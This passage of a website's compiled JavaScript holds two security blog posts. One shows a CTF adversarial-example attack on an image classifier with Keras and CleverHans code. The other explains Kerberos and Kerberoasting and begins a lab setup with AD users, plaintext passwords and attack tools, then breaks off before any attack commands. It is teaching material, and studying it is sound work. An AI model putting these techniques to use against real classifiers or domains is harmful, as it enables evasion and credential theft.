wondrous achievement. They solve classification and other learning tasks with great accuracy. However, they are not flawless and might misclassify certain inputs. No problem, some error is expected. But what if you could give it two inputs that are virtually identical, but you get different outputs? Worse, what if one is correctly classified but the other has been manipulated so that it is classified as \",/*#__PURE__*/e(\"em\",{children:\"anything\"}),\" you want? Could these \",/*#__PURE__*/e(\"em\",{children:\"adversarial examples\"}),\" be the bane of neural networks?\"]}),/*#__PURE__*/t(\"p\",{children:[\"That is what happened with one \",/*#__PURE__*/e(a,{href:\"https://picoctf.com/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"PicoCTF\"})}),\" challenge we came across recently. There is an application whose sole purpose is to accept a user-uploaded image, classify it, and let you know the results. Our task was to take the image of a dog, correctly classified as a \",/*#__PURE__*/e(\"em\",{children:\"Malinois\"}),\", and manipulate it so that it is classified as a tree frog. However, for your image to be a proper \",/*#__PURE__*/e(\"em\",{children:\"adversarial example\"}),\", it must be perceptually indistinguishable from the original, in other words, it must still look like the same previously-classified dog to a human.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Dog or frog challenge\",className:\"framer-image\",height:\"539\",src:\"https://framerusercontent.com/images/Y0IfDdG6ZvduRQmD5XNv9TGOM.png\",srcSet:\"https://framerusercontent.com/images/Y0IfDdG6ZvduRQmD5XNv9TGOM.png?scale-down-to=512 512w,https://framerusercontent.com/images/Y0IfDdG6ZvduRQmD5XNv9TGOM.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/Y0IfDdG6ZvduRQmD5XNv9TGOM.png 1919w\",style:{aspectRatio:\"1919 / 1079\"},width:\"959\"}),/*#__PURE__*/t(\"h6\",{children:[\"Figure 1. \",/*#__PURE__*/e(a,{href:\"http://2018shell.picoctf.com:11889/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Challenge\"})}),\" description.\"]}),/*#__PURE__*/e(\"p\",{children:\"The applications are potentially endless. You could:\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"fool image recognition systems like physical security cameras, as does this \",/*#__PURE__*/e(a,{href:\"https://github.com/advboxes/AdvBox/blob/master/applications/StealthTshirt/README.md\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Stealth T-shirt\"})}),\".\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"T-shirt\",className:\"framer-image\",height:\"67\",src:\"https://framerusercontent.com/images/kSbrBxNFDfI8DHWaFzV4ejbX7U.gif\",style:{aspectRatio:\"240 / 135\"},width:\"120\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"make an autonomous car crash.\"})})}),/*#__PURE__*/e(\"img\",{alt:\"Stop\",className:\"framer-image\",height:\"225\",src:\"https://framerusercontent.com/images/BqAV2PsQL8ScLtrbJP7gLFXgMg.png\",srcSet:\"https://framerusercontent.com/images/BqAV2PsQL8ScLtrbJP7gLFXgMg.png?scale-down-to=512 512w,https://framerusercontent.com/images/BqAV2PsQL8ScLtrbJP7gLFXgMg.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/BqAV2PsQL8ScLtrbJP7gLFXgMg.png 1920w\",style:{aspectRatio:\"1920 / 450\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"confuse virtual assistants.\"})})}),/*#__PURE__*/e(\"img\",{alt:\"Virtual assistant\",className:\"framer-image\",height:\"210\",src:\"https://framerusercontent.com/images/g9FrGD7Lz6uDXZT2tpU59SqVEqU.png\",srcSet:\"https://framerusercontent.com/images/g9FrGD7Lz6uDXZT2tpU59SqVEqU.png?scale-down-to=512 512w,https://framerusercontent.com/images/g9FrGD7Lz6uDXZT2tpU59SqVEqU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/g9FrGD7Lz6uDXZT2tpU59SqVEqU.png 1920w\",style:{aspectRatio:\"1920 / 420\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"bypass spam filters, etc.\"})})}),/*#__PURE__*/t(\"p\",{children:[\"So, how does one go about creating such an adversarial example? Recall that in our brief survey of machine learning techniques, we discussed \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/blog/crash-course-machine-learning/#artificial-neural-networks-and-deep-learning\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"training neural networks\"})}),\". It is an iterative process in which you continuously adjust the \",/*#__PURE__*/e(\"em\",{children:\"weight\"}),\" parameters of your black box (the \",/*#__PURE__*/e(\"code\",{children:\"ANN\"}),\") until the outputs agree with the expected ones, or at least, \",/*#__PURE__*/e(\"em\",{children:\"minimize\"}),\" the cost function, which is a measure of how wrong the prediction is. I will borrow an image that better explains it from an article by \",/*#__PURE__*/e(a,{href:\"https://medium.com/@ageitgey/machine-learning-is-fun-part-8-how-to-intentionally-trick-neural-networks-b55da32b7196\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Adam Geitgey\"})}),\".\"]}),/*#__PURE__*/e(\"img\",{alt:\"Training a neural network\",className:\"framer-image\",height:\"539\",src:\"https://framerusercontent.com/images/DSLwPWYfzspWTEHRm8oSDGoA.png\",srcSet:\"https://framerusercontent.com/images/DSLwPWYfzspWTEHRm8oSDGoA.png?scale-down-to=512 512w,https://framerusercontent.com/images/DSLwPWYfzspWTEHRm8oSDGoA.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/DSLwPWYfzspWTEHRm8oSDGoA.png 1919w\",style:{aspectRatio:\"1919 / 1079\"},width:\"959\"}),/*#__PURE__*/t(\"h6\",{children:[\"Figure 2. \",/*#__PURE__*/e(a,{href:\"https://medium.com/@ageitgey/machine-learning-is-fun-part-8-how-to-intentionally-trick-neural-networks-b55da32b7196\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Training a neural network\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"This technique is known as \",/*#__PURE__*/e(\"em\",{children:\"backpropagation\"}),\". Now, in order to obtain a picture that is still like the original, but will classify as something entirely different, what one could do is add some noise; but not too much noise, so the picture doesn’t change, and not just anywhere, but exactly in the right places, so that the classifier reads a different pattern. Some clever folks from Google found out that the best way to do this is by using the gradient of the cost function.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Adding noise\",className:\"framer-image\",height:\"250\",src:\"https://framerusercontent.com/images/281sJggJp7k0sEF3sP7R8jYeAc.png\",srcSet:\"https://framerusercontent.com/images/281sJggJp7k0sEF3sP7R8jYeAc.png?scale-down-to=512 512w,https://framerusercontent.com/images/281sJggJp7k0sEF3sP7R8jYeAc.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/281sJggJp7k0sEF3sP7R8jYeAc.png 1920w\",style:{aspectRatio:\"1920 / 500\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[\"Figure 3. \",/*#__PURE__*/e(a,{href:\"https://arxiv.org/pdf/1412.6572\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Adding noise to fool the classifier\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"This is called the \",/*#__PURE__*/e(\"em\",{children:\"fast gradient sign\"}),\" method. This gradient can be computed using \",/*#__PURE__*/e(\"em\",{children:\"backpropagation\"}),\" but in reverse. Since the model is already trained, and we can’t modify it, let’s modify the picture little by little and see if it gets us any closer to the target. I will again borrow from \",/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(a,{href:\"https://medium.com/@ageitgey\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"@ageitgey\"})})}),\" since the analogy is much clearer this way.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Generating hacked picture\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/HpOSWhrfOoOyYV6SG8w0lAjJ0g.png\",srcSet:\"https://framerusercontent.com/images/HpOSWhrfOoOyYV6SG8w0lAjJ0g.png?scale-down-to=512 512w,https://framerusercontent.com/images/HpOSWhrfOoOyYV6SG8w0lAjJ0g.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/HpOSWhrfOoOyYV6SG8w0lAjJ0g.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[\"Figure 4. \",/*#__PURE__*/e(a,{href:\"https://medium.com/@ageitgey/machine-learning-is-fun-part-8-how-to-intentionally-trick-neural-networks-b55da32b7196\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Tweaking the image\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"The pseudo-code that would generate an adversarial example via this method would be as follows. Assume that the model is saved in a \",/*#__PURE__*/e(\"code\",{children:\"Keras\"}),\" \",/*#__PURE__*/e(\"code\",{children:\"h5\"}),\" file, as in the challenge. \",/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(a,{href:\"https://keras.io/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Keras\"})})}),\" is a popular high-level neural networks \",/*#__PURE__*/e(\"code\",{children:\"API\"}),\" for \",/*#__PURE__*/e(\"code\",{children:\"Python\"}),\". We can load the model, get the input and output layers (first and last), get the cost and gradient functions and define a convenience function that returns both for a particular input, like this:\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Getting cost function and gradients from a neural network.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"from keras.models import load_model\\nfrom keras import backend as K\\n\\nmodel                  = load_model('model.h5')\\ninput_layer            = model.layers[0].input\\noutput_layer           = model.layers[-1].output\\ncost_function          = output_layer[0, object_type_to_fake]\\ngradient_function      = K.gradients(cost_function, input_layer)[0]\\nget_cost_and_gradients = K.function([input_layer, K.learning_phase()],\\n                                    [cost_function, gradient_function])\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Where \",/*#__PURE__*/e(\"code\",{children:\"object_type_to_fake\"}),\" is the class number of what we want to fake. Now, according to the formula in figure 3 above, we should add a small fraction of the sign of the gradient, until we achieve the result. The result should be that the confidence in the prediction becomes at least 95%.\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"while confidence < 0.95:\\n    cost, gradient = get_cost_and_gradients([adversarial_image, 0])\\n    adversarial_image += 0.007 * np.sign(gradient)\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"However, this procedure takes way too long without a \",/*#__PURE__*/e(\"code\",{children:\"GPU\"}),\". A few hours according to \",/*#__PURE__*/e(a,{href:\"https://medium.com/@ageitgey/machine-learning-is-fun-part-8-how-to-intentionally-trick-neural-networks-b55da32b7196\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Geitgey\"})}),\". For the \",/*#__PURE__*/e(\"code\",{children:\"CTFer\"}),\" and the more practical-minded reader, there is a library that does this and other attacks on machine learning systems to determine their vulnerability to adversarial examples: \",/*#__PURE__*/e(a,{href:\"https://github.com/tensorflow/cleverhans/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"CleverHans\"})}),\". Using this library, we change the expensive \",/*#__PURE__*/e(\"code\",{children:\"while\"}),\" cycle above to two \",/*#__PURE__*/e(\"code\",{children:\"API\"}),\" calls: make an instance of the attack method and then ask it to generate the adversarial example.\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"from cleverhans.attacks import MomentumIterativeMethod\\n\\nmethod = MomentumIterativeMethod(model, sess=K.get_session())\\ntest   = method.generate_np(adversarial_image, eps=0.3, eps_iter=0.06,\\n                            nb_iter=10, y_target=target)\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"In this case, we used a different attack, namely the \",/*#__PURE__*/e(\"code\",{children:\"MomentumIterativeMethod\"}),\" because, in this situation, it gives better results than the \",/*#__PURE__*/e(\"code\",{children:\"FastGradientMethod\"}),\", obviously also a part of \",/*#__PURE__*/e(\"code\",{children:\"CleverHans\"}),\". And so we obtain our adversarial example.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Adversarial image\",className:\"framer-image\",height:\"250\",src:\"https://framerusercontent.com/images/AAdFdlOncwN6gLEGEwkKd4kY4nM.png\",srcSet:\"https://framerusercontent.com/images/AAdFdlOncwN6gLEGEwkKd4kY4nM.png?scale-down-to=512 512w,https://framerusercontent.com/images/AAdFdlOncwN6gLEGEwkKd4kY4nM.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/AAdFdlOncwN6gLEGEwkKd4kY4nM.png 1920w\",style:{aspectRatio:\"1920 / 500\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Figure 5. Adversarial image for the challenge.\"}),/*#__PURE__*/t(\"p\",{children:[\"You can almost \",/*#__PURE__*/e(\"em\",{children:\"see\"}),\" the tree frog lurking in the back, if you imagine the two knobs on the cabinet are its eyes. Just kidding. Upload it to the challenge site and, instead of getting the predictions, we get the flag.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Not just that, the model which is based on \",/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(a,{href:\"https://ai.googleblog.com/2017/06/mobilenets-open-source-models-for.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"MobileNet\"})})}),\", is 99.99974% certain that this is a tree frog. However, the difference between it and the original image, according to the widely used perceptual hash algorithm, is less than two bits. Still, the adversarial example has artifacts, at least to a human observer.\"]}),/*#__PURE__*/t(\"p\",{children:[\"What is worse is that these issues persist \",/*#__PURE__*/e(\"em\",{children:\"across\"}),\" different models as long as the training data is similar. That means that we could probably pass the same image to a different animal image classifier and still get the same results.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Ultimately, we should think twice before deploying \",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\"-powered security measures. This is, of course, a mock example, but in more critical situations, having models that are not resistant to adversarial examples could result in catastrophic effects. \",/*#__PURE__*/e(a,{href:\"https://arxiv.org/pdf/1412.6572\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Apparently\"})}),\", the reason behind this is the linearity within the functions hidden in these networks. So switching to a more non-linear model, such as \",/*#__PURE__*/e(a,{href:\"https://en.wikipedia.org/wiki/Radial_basis_function_network\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"RBF networks\"})}),\", could solve the problem. Another workaround could be to train the \",/*#__PURE__*/e(\"code\",{children:\"ANNs\"}),\" \",/*#__PURE__*/e(\"em\",{children:\"including\"}),\" adversarial examples.\"]}),/*#__PURE__*/e(\"p\",{children:'To borrow a phrase from carpenters, \"Measure twice, cut once.\" We should also remember that whatever the solution, it should be clear that one should test twice, and deploy once.'})]});export const richText14=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"Kerberos\"}),\" is a protocol developed by \",/*#__PURE__*/e(a,{href:\"http://web.mit.edu/kerberos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"MIT\"})}),\" used to authenticate network services. It is built using secret-key cryptography and uses a trusted third-party server called \",/*#__PURE__*/e(\"code\",{children:\"Authentication Server\"}),\". This protocol authenticates users and services using tickets. When a client logs in their identity is authenticated via the \",/*#__PURE__*/e(\"code\",{children:\"Authentication Server\"}),\" (\",/*#__PURE__*/e(\"code\",{children:\"AS\"}),\"). The AS then forwards the username to a \",/*#__PURE__*/e(\"code\",{children:\"Key Distribution Center\"}),\" (\",/*#__PURE__*/e(\"code\",{children:\"KDC\"}),\") that issues a \",/*#__PURE__*/e(\"code\",{children:\"Ticket-Granting Ticket\"}),\" (\",/*#__PURE__*/e(\"code\",{children:\"TGT\"}),\"). this ticket is the user’s proof of identity.\"]}),/*#__PURE__*/e(\"p\",{children:\"This is how Kerberos protocol works:\"}),/*#__PURE__*/t(\"ol\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"A client sends a request to to the \",/*#__PURE__*/e(\"code\",{children:\"AS\"}),\" soliciting a \",/*#__PURE__*/e(\"code\",{children:\"TGT\"}),\". This request is built using the machine computer time and encrypting it with the user’s password hash.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Because the AD (Active Directory) has the user’s password it can decrypt the request. The server can then verify the user’s authentication data and respond back to the client with a TGT and a session key for the TGT.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Because the user now has a valid TGT for the domain, they can send a request for a service ticket.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Now the server verifies the validity of the \",/*#__PURE__*/e(\"code\",{children:\"TGT\"}),\" and responds back with the service ticket and a service session key.\"]})})]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"Kerberoast\"}),\", discovered by \",/*#__PURE__*/e(a,{href:\"https://twitter.com/TimMedin\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Tim Medin\"})}),\", works by requesting Kerberos service tickets, \",/*#__PURE__*/e(\"code\",{children:\"TGTs\"}),\", from the \",/*#__PURE__*/e(\"code\",{children:\"Authentication Server\"}),\", \",/*#__PURE__*/e(\"code\",{children:\"AS\"}),\", which is an action that any valid domain user can do. These service tickets are a hash that we can crack. We then have access to our target server which provides us with elevated privileges or even the ability to impersonate another user.\"]}),/*#__PURE__*/t(\"p\",{children:[\"To do this you need a valid domain user, so any employee of an organization can exploit this. If you are an anonymous attacker on the network, there are several ways to obtain user credentials. These include doing an \",/*#__PURE__*/e(\"code\",{children:\"MDNS\"}),\" spoofing attack on the network (\",/*#__PURE__*/e(a,{href:\"https://github.com/SpiderLabs/Responder\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Responder\"})}),\"), an Evil Twin attack to the wireless network if they have enterprise security or a phishing email attack that uses an enterprise login with the \",/*#__PURE__*/e(\"code\",{children:\"AD\"}),\", among others.\"]})]});export const richText15=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Kerberoast lab\"}),/*#__PURE__*/t(\"p\",{children:[\"To set up our lab we are going to use \",/*#__PURE__*/e(\"code\",{children:\"Hashicorp’s\"}),\" \",/*#__PURE__*/e(a,{href:\"https://www.vagrantup.com/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Vagrant\"})}),\"; the source files are below. Create a folder with the name \",/*#__PURE__*/e(\"code\",{children:\"kerberoast\"}),\" and save the \",/*#__PURE__*/e(\"code\",{children:\"Vagrantfile\"}),\" there. Also create another folder inside \",/*#__PURE__*/e(\"code\",{children:\"kerberoast\"}),\" named \",/*#__PURE__*/e(\"code\",{children:\"provision\"}),\" and save the file \",/*#__PURE__*/e(\"code\",{children:\"ad.ps1\"}),\" there.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"setting up the lab.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"$ mkdir kerberoast\\n$ cd kerberoast\\nkerberoast$ nano Vagrantfile #Add here the content\\nkerberoast$ mkdir provision\\nkerberoast$ nano provision/ad.ps1 #Add here the content\",language:\"Shell\"})})}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Vagrantfile.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:'# -*- mode: ruby -*-\\n# vi: set ft=ruby :\\n\\nVagrant.configure(\"2\") do |config|\\n\\n  config.vm.box = \"cdaf/WindowsServerDC\"\\n  config.vm.hostname = \"winserver\"\\n  config.vm.network \"private_network\", ip: \"192.168.56.2\"\\n  config.vm.provision \"shell\", path: \"provision/ad.ps1\"\\n\\nend',language:\"Ruby\"})})}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"provision/ad.ps1.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:'Import-Module ServerManager\\nAdd-WindowsFeature RSAT-AD-PowerShell\\nimport-module activedirectory\\nNew-ADuser -Name \"kertest\" -SamAccountName kertest -Enabled $true -AccountPassword (ConvertTo-SecureString -AsPlainText \"SuperSecure@123!!!\" -Force)\\nNew-ADuser -Name \"svctest\" -SamAccountName svctest -Enabled $true -AccountPassword (ConvertTo-SecureString -AsPlainText \"Monkey.123\" -Force)\\nsetspn -A sky.net/kertest kertest\\nsetspn -A sky.net/svctest svctest\\nAdd-ADGroupMember -Identity \"Administrators\" -Members svctest\\nAdd-ADGroupMember -Identity \"Users\" -Members kertest',language:\"Markdown\"})})}),/*#__PURE__*/e(\"p\",{children:\"Then run the environment using:\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"vagrant up.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"kerberoast$ vagrant up\",language:\"Shell\"})})}),/*#__PURE__*/t(\"p\",{children:[\"This will create a \",/*#__PURE__*/e(\"code\",{children:\"Windows\"}),\" machine with \",/*#__PURE__*/e(\"code\",{children:\"Active Directory\"}),\" installed and configured. At this point, everything we need has been completed and is ready for us to launch an attack.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Now we can set up our attacking machine. Here we are using \",/*#__PURE__*/e(a,{href:\"https://www.kali.org/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Kali Linux\"})}),\" with \",/*#__PURE__*/e(\"code\",{children:\"Vagrant\"}),\" too, but you can use whatever \",/*#__PURE__*/e(\"code\",{children:\"OS\"}),\" you prefer.\"]}),/*#__PURE__*/e(\"p\",{children:\"These are the tools that we are going to use:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(a,{href:\"https://nmap.org/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"nmap\"})})})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(a,{href:\"http://netcat.sourceforge.net/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"netcat\"})})})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(a,{href:\"https://github.com/ShawnDEvans/smbmap\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"smbmap\"})})})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(a,{href:\"https://github.com/SecureAuthCorp/impacket\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Impacket\"})})})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(a,{href:\"https://github.com/danielmiessler/SecLists\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"SecLists\"})})})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(a,{href:\"https://github.com/magnumripper/JohnTheRipper\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"JohnTheRipper\"})})})})]}),/*#__PURE__*/t(\"p\",{children:[\"If you are using \",/*#__PURE__*/e(\"code\",{children:\"Kali\"}),\" the only thing that needs to be installed is \",/*#__PURE__*/e(\"code\",{children:\"impacket\"}),\". But first, we need to clone it.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"cloning impacket.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"git clone https://github.com/SecureAuthCorp/impacket\",language:\"Shell\"})})}),/*#__PURE__*/e(\"p\",{children:\"Then go to the folder and install it.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"installing impacket.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"$ cd impacket\\nimpacket$ pip install -r requirements.txt\\nimpacket$ python setup.py\",language:\"Shell\"})})}),/*#__PURE__*/t(\"p\",{children:[\"The 